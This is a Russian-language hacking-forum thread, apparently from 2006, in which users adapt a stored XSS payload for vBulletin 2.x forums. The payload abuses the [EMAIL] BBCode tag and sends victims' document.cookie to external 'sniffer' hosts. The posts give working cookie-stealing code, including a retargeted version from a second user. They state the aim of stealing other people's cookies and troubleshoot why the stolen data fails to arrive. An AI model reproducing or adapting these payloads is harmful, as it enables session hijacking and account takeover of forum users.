Форумы vBulletin 2.*.* - XSS

Discussion in 'Уязвимости CMS/форумов' started by }{0TT@БЬ)Ч, 30 Nov 2006.

  1. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    есть код [E*MAIL][email protected]"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss)); помогите переделать под другой снифер или объясните что тут менять?

    Вот под этот
    Адрес картинки-сниффера:
    http://www.snif.ru/snif/s.gif?id=102

    что бы украсть чьи-то cookies, то код должен быть примерно таким:

    <script>img=new Image(); img.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;</script>
     
  2. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    хм..

    Code:
    [E*MAIL][email protected]"'s='[/E*MAIL]' sss="i=new Image(); i.src="http://www.snif.ru/snif/s.gif?id=102&"+document.cookie;this.sss=null" style=top:expression(eval(this.sss));
     
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    в том то и дело что так я уже пробовал и ни че не пришло на снифер но на ачатовский приходит походу дело в снифере может кто скажет в чем может быть разница?
     
  4. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    если мне память не изменяет то эта xss уже описывалась давно -- там стоит ограничение на строку с мылом в 60 символов --- поэтому твой скрипт обрезает
     
  5. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    форум то скрипт нормально проглатывает, чето я не понял на ачатовский снифак же куки приходят.